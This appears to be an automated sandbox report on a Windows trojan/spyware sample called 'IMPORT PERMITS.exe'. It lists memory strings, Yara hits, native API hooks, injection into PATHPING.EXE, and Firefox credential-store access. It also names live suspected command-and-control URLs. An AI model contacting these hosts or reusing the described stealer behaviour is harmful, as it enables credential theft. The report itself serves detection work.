                Source: PATHPING.EXE, 00000007.00000002.4122469051.00000000039D8000.00000004.10000000.00040000.00000000.sdmp, gKZXbGXeVZyo.exe, 00000008.00000002.4122240673.0000000003AB8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://roopiedutech.online/w5is/?Z0WTZ=HbCgM9YcBMttwdZrXhLlY5z1HFkNRQK7DIvCaf9ftWyGunbQ91oOdhxta7T/v
                Source: IMPORT PERMITS.exeString found in binary or memory: http://tempuri.org/GameInfoDataSet.xsdGFinalProjectTV.Properties.Resources
                Source: IMPORT PERMITS.exe, 00000000.00000002.1769285490.0000000006C12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                Source: IMPORT PERMITS.exe, 00000000.00000002.1769285490.0000000006C12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
                Source: gKZXbGXeVZyo.exe, 00000008.00000002.4123927554.0000000005848000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.cmdh1c.xyz
                Source: gKZXbGXeVZyo.exe, 00000008.00000002.4123927554.0000000005848000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.cmdh1c.xyz/6byd/
                Source: IMPORT PERMITS.exe, 00000000.00000002.1769285490.0000000006C12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
                Source: IMPORT PERMITS.exe, 00000000.00000002.1769285490.0000000006C12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
                Source: IMPORT PERMITS.exe, 00000000.00000002.1769285490.0000000006C12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
                Source: IMPORT PERMITS.exe, 00000000.00000002.1769285490.0000000006C12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
                Source: IMPORT PERMITS.exe, 00000000.00000002.1769285490.0000000006C12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
                Source: IMPORT PERMITS.exe, 00000000.00000002.1769285490.0000000006C12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
                Source: IMPORT PERMITS.exe, 00000000.00000002.1769285490.0000000006C12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
                Source: IMPORT PERMITS.exe, 00000000.00000002.1769285490.0000000006C12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
                Source: IMPORT PERMITS.exe, 00000000.00000002.1769285490.0000000006C12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
                Source: IMPORT PERMITS.exe, 00000000.00000002.1769285490.0000000006C12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
                Source: IMPORT PERMITS.exe, 00000000.00000002.1769285490.0000000006C12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
                Source: IMPORT PERMITS.exe, 00000000.00000002.1769285490.0000000006C12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
                Source: IMPORT PERMITS.exe, 00000000.00000002.1769285490.0000000006C12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
                Source: IMPORT PERMITS.exe, 00000000.00000002.1769285490.0000000006C12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
                Source: IMPORT PERMITS.exe, 00000000.00000002.1769285490.0000000006C12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
                Source: IMPORT PERMITS.exe, 00000000.00000002.1769285490.0000000006C12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
                Source: IMPORT PERMITS.exe, 00000000.00000002.1769255784.0000000005B40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.monotype.
                Source: IMPORT PERMITS.exe, 00000000.00000002.1769285490.0000000006C12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
                Source: IMPORT PERMITS.exe, 00000000.00000002.1769285490.0000000006C12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
                Source: IMPORT PERMITS.exe, 00000000.00000002.1769285490.0000000006C12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
                Source: IMPORT PERMITS.exe, 00000000.00000002.1769285490.0000000006C12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
                Source: IMPORT PERMITS.exe, 00000000.00000002.1769285490.0000000006C12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
                Source: IMPORT PERMITS.exe, 00000000.00000002.1769285490.0000000006C12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
                Source: IMPORT PERMITS.exe, 00000000.00000002.1769285490.0000000006C12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
                Source: PATHPING.EXE, 00000007.00000002.4124302032.00000000075E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: PATHPING.EXE, 00000007.00000002.4122469051.0000000004668000.00000004.10000000.00040000.00000000.sdmp, gKZXbGXeVZyo.exe, 00000008.00000002.4122240673.0000000004748000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://cdn.adm.tools/parking-page/style.css
                Source: PATHPING.EXE, 00000007.00000002.4124302032.00000000075E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: PATHPING.EXE, 00000007.00000002.4124302032.00000000075E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: PATHPING.EXE, 00000007.00000002.4124302032.00000000075E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: PATHPING.EXE, 00000007.00000002.4124302032.00000000075E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: PATHPING.EXE, 00000007.00000002.4124302032.00000000075E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: PATHPING.EXE, 00000007.00000002.4124302032.00000000075E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: PATHPING.EXE, 00000007.00000002.4120881456.00000000006DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                Source: PATHPING.EXE, 00000007.00000002.4120881456.00000000006DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                Source: PATHPING.EXE, 00000007.00000002.4120881456.00000000006DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                Source: PATHPING.EXE, 00000007.00000002.4120881456.00000000006DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
                Source: PATHPING.EXE, 00000007.00000002.4120881456.00000000006DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                Source: PATHPING.EXE, 00000007.00000002.4120881456.00000000006DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                Source: PATHPING.EXE, 00000007.00000003.2232466066.00000000075CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
                Source: PATHPING.EXE, 00000007.00000002.4124302032.00000000075E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: PATHPING.EXE, 00000007.00000002.4122469051.000000000498C000.00000004.10000000.00040000.00000000.sdmp, PATHPING.EXE, 00000007.00000002.4124184578.0000000005BA0000.00000004.00000800.00020000.00000000.sdmp, gKZXbGXeVZyo.exe, 00000008.00000002.4122240673.0000000004A6C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.google.com
                Source: PATHPING.EXE, 00000007.00000002.4122469051.0000000004668000.00000004.10000000.00040000.00000000.sdmp, gKZXbGXeVZyo.exe, 00000008.00000002.4122240673.0000000004748000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.ukraine.com.ua/wiki/hosting/errors/site-not-served/

                E-Banking Fraud

                Source: Yara matchFile source: 2.2.IMPORT PERMITS.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.IMPORT PERMITS.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000007.00000002.4121846462.0000000002A10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2056520278.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.4120631323.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.4121706840.00000000008C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2058360059.0000000001750000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.4123927554.00000000057E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.4121787054.0000000004A50000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2058495171.00000000035D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_0042C343 NtClose,2_2_0042C343
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_01422B60 NtClose,LdrInitializeThunk,2_2_01422B60
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_01422DF0 NtQuerySystemInformation,LdrInitializeThunk,2_2_01422DF0
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_01422C70 NtFreeVirtualMemory,LdrInitializeThunk,2_2_01422C70
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_014235C0 NtCreateMutant,LdrInitializeThunk,2_2_014235C0
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_01424340 NtSetContextThread,2_2_01424340
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_01424650 NtSuspendThread,2_2_01424650
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exe Code function: 2_2_01422BE0 NtQueryValueKey,2_2_01422BE0
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exe Code function: 2_2_01422BF0 NtAllocateVirtualMemory,2_2_01422BF0
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exe Code function: 2_2_01422B80 NtQueryInformationFile,2_2_01422B80
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exe Code function: 2_2_01422BA0 NtEnumerateValueKey,2_2_01422BA0
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exe Code function: 2_2_01422AD0 NtReadFile,2_2_01422AD0
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exe Code function: 2_2_01422AF0 NtWriteFile,2_2_01422AF0
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exe Code function: 2_2_01422AB0 NtWaitForSingleObject,2_2_01422AB0
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exe Code function: 2_2_01422D00 NtSetInformationFile,2_2_01422D00
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exe Code function: 2_2_01422D10 NtMapViewOfSection,2_2_01422D10
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exe Code function: 2_2_01422D30 NtUnmapViewOfSection,2_2_01422D30
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exe Code function: 2_2_01422DD0 NtDelayExecution,2_2_01422DD0
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exe Code function: 2_2_01422DB0 NtEnumerateKey,2_2_01422DB0
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exe Code function: 2_2_01422C60 NtCreateKey,2_2_01422C60
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exe Code function: 2_2_01422C00 NtQueryInformationProcess,2_2_01422C00
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exe Code function: 2_2_01422CC0 NtQueryVirtualMemory,2_2_01422CC0
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exe Code function: 2_2_01422CF0 NtOpenProcess,2_2_01422CF0
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exe Code function: 2_2_01422CA0 NtQueryInformationToken,2_2_01422CA0
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exe Code function: 2_2_01422F60 NtCreateProcessEx,2_2_01422F60
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exe Code function: 2_2_01422F30 NtCreateSection,2_2_01422F30
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exe Code function: 2_2_01422FE0 NtCreateFile,2_2_01422FE0
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exe Code function: 2_2_01422F90 NtProtectVirtualMemory,2_2_01422F90
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exe Code function: 2_2_01422FA0 NtQuerySection,2_2_01422FA0
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exe Code function: 2_2_01422FB0 NtResumeThread,2_2_01422FB0
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exe Code function: 2_2_01422E30 NtWriteVirtualMemory,2_2_01422E30
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exe Code function: 2_2_01422EE0 NtQueueApcThread,2_2_01422EE0
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exe Code function: 2_2_01422E80 NtReadVirtualMemory,2_2_01422E80
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exe Code function: 2_2_01422EA0 NtAdjustPrivilegesToken,2_2_01422EA0
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exe Code function: 2_2_01423010 NtOpenDirectoryObject,2_2_01423010
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exe Code function: 2_2_01423090 NtSetValueKey,2_2_01423090
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exe Code function: 2_2_014239B0 NtGetContextThread,2_2_014239B0
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exe Code function: 2_2_01423D70 NtOpenThread,2_2_01423D70
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exe Code function: 2_2_01423D10 NtOpenProcessToken,2_2_01423D10
                Source: C:\Windows\SysWOW64\PATHPING.EXE Code function: 7_2_02D14340 NtSetContextThread,LdrInitializeThunk,7_2_02D14340
                Source: C:\Windows\SysWOW64\PATHPING.EXE Code function: 7_2_02D14650 NtSuspendThread,LdrInitializeThunk,7_2_02D14650
                Source: C:\Windows\SysWOW64\PATHPING.EXE Code function: 7_2_02D12AD0 NtReadFile,LdrInitializeThunk,7_2_02D12AD0
                Source: C:\Windows\SysWOW64\PATHPING.EXE Code function: 7_2_02D12AF0 NtWriteFile,LdrInitializeThunk,7_2_02D12AF0
                Source: C:\Windows\SysWOW64\PATHPING.EXE Code function: 7_2_02D12BF0 NtAllocateVirtualMemory,LdrInitializeThunk,7_2_02D12BF0
                Source: C:\Windows\SysWOW64\PATHPING.EXE Code function: 7_2_02D12BE0 NtQueryValueKey,LdrInitializeThunk,7_2_02D12BE0
                Source: C:\Windows\SysWOW64\PATHPING.EXE Code function: 7_2_02D12BA0 NtEnumerateValueKey,LdrInitializeThunk,7_2_02D12BA0
                Source: C:\Windows\SysWOW64\PATHPING.EXE Code function: 7_2_02D12B60 NtClose,LdrInitializeThunk,7_2_02D12B60
                Source: C:\Windows\SysWOW64\PATHPING.EXE Code function: 7_2_02D12EE0 NtQueueApcThread,LdrInitializeThunk,7_2_02D12EE0
                Source: C:\Windows\SysWOW64\PATHPING.EXE Code function: 7_2_02D12E80 NtReadVirtualMemory,LdrInitializeThunk,7_2_02D12E80
                Source: C:\Windows\SysWOW64\PATHPING.EXE Code function: 7_2_02D12FE0 NtCreateFile,LdrInitializeThunk,7_2_02D12FE0
                Source: C:\Windows\SysWOW64\PATHPING.EXE Code function: 7_2_02D12FB0 NtResumeThread,LdrInitializeThunk,7_2_02D12FB0
                Source: C:\Windows\SysWOW64\PATHPING.EXE Code function: 7_2_02D12F30 NtCreateSection,LdrInitializeThunk,7_2_02D12F30
                Source: C:\Windows\SysWOW64\PATHPING.EXE Code function: 7_2_02D12CA0 NtQueryInformationToken,LdrInitializeThunk,7_2_02D12CA0
                Source: C:\Windows\SysWOW64\PATHPING.EXE Code function: 7_2_02D12C70 NtFreeVirtualMemory,LdrInitializeThunk,7_2_02D12C70
                Source: C:\Windows\SysWOW64\PATHPING.EXE Code function: 7_2_02D12C60 NtCreateKey,LdrInitializeThunk,7_2_02D12C60
                Source: C:\Windows\SysWOW64\PATHPING.EXE Code function: 7_2_02D12DD0 NtDelayExecution,LdrInitializeThunk,7_2_02D12DD0
                Source: C:\Windows\SysWOW64\PATHPING.EXE Code function: 7_2_02D12DF0 NtQuerySystemInformation,LdrInitializeThunk,7_2_02D12DF0
                Source: C:\Windows\SysWOW64\PATHPING.EXE Code function: 7_2_02D12D10 NtMapViewOfSection,LdrInitializeThunk,7_2_02D12D10
                Source: C:\Windows\SysWOW64\PATHPING.EXE Code function: 7_2_02D12D30 NtUnmapViewOfSection,LdrInitializeThunk,7_2_02D12D30
                Source: C:\Windows\SysWOW64\PATHPING.EXE Code function: 7_2_02D135C0 NtCreateMutant,LdrInitializeThunk,7_2_02D135C0
                Source: C:\Windows\SysWOW64\PATHPING.EXE Code function: 7_2_02D139B0 NtGetContextThread,LdrInitializeThunk,7_2_02D139B0
                Source: C:\Windows\SysWOW64\PATHPING.EXE Code function: 7_2_02D12AB0 NtWaitForSingleObject,7_2_02D12AB0
                Source: C:\Windows\SysWOW64\PATHPING.EXE Code function: 7_2_02D12B80 NtQueryInformationFile,7_2_02D12B80
                Source: C:\Windows\SysWOW64\PATHPING.EXE Code function: 7_2_02D12EA0 NtAdjustPrivilegesToken,7_2_02D12EA0
                Source: C:\Windows\SysWOW64\PATHPING.EXE Code function: 7_2_02D12E30 NtWriteVirtualMemory,7_2_02D12E30
                Source: C:\Windows\SysWOW64\PATHPING.EXE Code function: 7_2_02D12F90 NtProtectVirtualMemory,7_2_02D12F90
                Source: C:\Windows\SysWOW64\PATHPING.EXE Code function: 7_2_02D12FA0 NtQuerySection,7_2_02D12FA0
                Source: C:\Windows\SysWOW64\PATHPING.EXE Code function: 7_2_02D12F60 NtCreateProcessEx,7_2_02D12F60
                Source: C:\Windows\SysWOW64\PATHPING.EXE Code function: 7_2_02D12CC0 NtQueryVirtualMemory,7_2_02D12CC0
                Source: C:\Windows\SysWOW64\PATHPING.EXE Code function: 7_2_02D12CF0 NtOpenProcess,7_2_02D12CF0
                Source: C:\Windows\SysWOW64\PATHPING.EXE Code function: 7_2_02D12C00 NtQueryInformationProcess,7_2_02D12C00
                Source: C:\Windows\SysWOW64\PATHPING.EXE Code function: 7_2_02D12DB0 NtEnumerateKey,7_2_02D12DB0
                Source: C:\Windows\SysWOW64\PATHPING.EXE Code function: 7_2_02D12D00 NtSetInformationFile,7_2_02D12D00
                Source: C:\Windows\SysWOW64\PATHPING.EXE Code function: 7_2_02D13090 NtSetValueKey,7_2_02D13090
                Source: C:\Windows\SysWOW64\PATHPING.EXE Code function: 7_2_02D13010 NtOpenDirectoryObject,7_2_02D13010
                Source: C:\Windows\SysWOW64\PATHPING.EXE Code function: 7_2_02D13D70 NtOpenThread,7_2_02D13D70
                Source: C:\Windows\SysWOW64\PATHPING.EXE Code function: 7_2_02D13D10 NtOpenProcessToken,7_2_02D13D10
                Source: C:\Windows\SysWOW64\PATHPING.EXE Code function: 7_2_00428C00 NtCreateFile,7_2_00428C00
                Source: C:\Windows\SysWOW64\PATHPING.EXE Code function: 7_2_00428D70 NtReadFile,7_2_00428D70
                Source: C:\Windows\SysWOW64\PATHPING.EXE Code function: 7_2_00428E70 NtDeleteFile,7_2_00428E70
                Source: C:\Windows\SysWOW64\PATHPING.EXE Code function: 7_2_00428F20 NtClose,7_2_00428F20
                Source: C:\Windows\SysWOW64\PATHPING.EXE Code function: 7_2_00429090 NtAllocateVirtualMemory,7_2_00429090
                Source: IMPORT PERMITS.exe, 00000000.00000000.1652444552.00000000006A0000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameGPUK.exe6 vs IMPORT PERMITS.exe
                Source: IMPORT PERMITS.exe, 00000000.00000002.1770202165.000000000A140000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameTyrone.dll8 vs IMPORT PERMITS.exe
                Source: IMPORT PERMITS.exe, 00000000.00000002.1755514077.00000000029E1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilename vs IMPORT PERMITS.exe
                Source: IMPORT PERMITS.exe, 00000000.00000002.1749679968.0000000000B4E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameclr.dllT vs IMPORT PERMITS.exe
                Source: IMPORT PERMITS.exe, 00000002.00000002.2056786329.0000000000E88000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamepathping.exej% vs IMPORT PERMITS.exe
                Source: IMPORT PERMITS.exe, 00000002.00000002.2056786329.0000000000EA2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamepathping.exej% vs IMPORT PERMITS.exe
                Source: IMPORT PERMITS.exe, 00000002.00000002.2056962870.00000000014DD000.00000040.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs IMPORT PERMITS.exe
                Source: IMPORT PERMITS.exe Binary or memory string: OriginalFilenameGPUK.exe6 vs IMPORT PERMITS.exe
                Source: IMPORT PERMITS.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: IMPORT PERMITS.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: 0.2.IMPORT PERMITS.exe.44aa618.0.raw.unpack, uJ2cQeL7dCfAKUv4kg.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.IMPORT PERMITS.exe.a140000.4.raw.unpack, SSO9hfyRu5sPNhP9Tv.cs Security API names: _0020.SetAccessControl
                Source: 0.2.IMPORT PERMITS.exe.a140000.4.raw.unpack, SSO9hfyRu5sPNhP9Tv.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.IMPORT PERMITS.exe.a140000.4.raw.unpack, SSO9hfyRu5sPNhP9Tv.csSecurity API names: _0020.AddAccessRule
                Source: 0.2.IMPORT PERMITS.exe.a140000.4.raw.unpack, uJ2cQeL7dCfAKUv4kg.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.IMPORT PERMITS.exe.4531e38.1.raw.unpack, SSO9hfyRu5sPNhP9Tv.csSecurity API names: _0020.SetAccessControl
                Source: 0.2.IMPORT PERMITS.exe.4531e38.1.raw.unpack, SSO9hfyRu5sPNhP9Tv.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.IMPORT PERMITS.exe.4531e38.1.raw.unpack, SSO9hfyRu5sPNhP9Tv.csSecurity API names: _0020.AddAccessRule
                Source: 0.2.IMPORT PERMITS.exe.44aa618.0.raw.unpack, SSO9hfyRu5sPNhP9Tv.csSecurity API names: _0020.SetAccessControl
                Source: 0.2.IMPORT PERMITS.exe.44aa618.0.raw.unpack, SSO9hfyRu5sPNhP9Tv.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.IMPORT PERMITS.exe.44aa618.0.raw.unpack, SSO9hfyRu5sPNhP9Tv.csSecurity API names: _0020.AddAccessRule
                Source: 0.2.IMPORT PERMITS.exe.4531e38.1.raw.unpack, uJ2cQeL7dCfAKUv4kg.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/2@16/11
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\IMPORT PERMITS.exe.log
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeMutant created: NULL
                Source: C:\Windows\SysWOW64\PATHPING.EXEFile created: C:\Users\user\AppData\Local\Temp\6276I39
                Source: IMPORT PERMITS.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: IMPORT PERMITS.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                Source: C:\Program Files\Mozilla Firefox\firefox.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                Source: PATHPING.EXE, 00000007.00000003.2235989235.0000000000726000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINXgrENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: PATHPING.EXE, 00000007.00000002.4120881456.0000000000747000.00000004.00000020.00020000.00000000.sdmp, PATHPING.EXE, 00000007.00000003.2235989235.0000000000747000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: IMPORT PERMITS.exeReversingLabs: Detection: 68%
                Source: IMPORT PERMITS.exeVirustotal: Detection: 55%
                Source: unknownProcess created: C:\Users\user\Desktop\IMPORT PERMITS.exe "C:\Users\user\Desktop\IMPORT PERMITS.exe"
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeProcess created: C:\Users\user\Desktop\IMPORT PERMITS.exe "C:\Users\user\Desktop\IMPORT PERMITS.exe"
                Source: C:\Program Files (x86)\YMJxZZmavOOTTWIQtgQujZlAaYvopMeOkXHcJtLPwiiYdskELLagnyeGTcrIUazJrFXDStrcKReOUIo\gKZXbGXeVZyo.exeProcess created: C:\Windows\SysWOW64\PATHPING.EXE "C:\Windows\SysWOW64\PATHPING.EXE"
                Source: C:\Windows\SysWOW64\PATHPING.EXEProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeSection loaded: mscoree.dll
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeSection loaded: apphelp.dll
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeSection loaded: kernel.appcore.dll
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeSection loaded: version.dll
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeSection loaded: vcruntime140_clr0400.dll
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeSection loaded: uxtheme.dll
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeSection loaded: windows.storage.dll
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeSection loaded: wldp.dll
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeSection loaded: profapi.dll
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeSection loaded: cryptsp.dll
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeSection loaded: rsaenh.dll
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeSection loaded: cryptbase.dll
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeSection loaded: riched20.dll
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeSection loaded: usp10.dll
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeSection loaded: msls31.dll
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeSection loaded: dwrite.dll
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeSection loaded: amsi.dll
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeSection loaded: userenv.dll
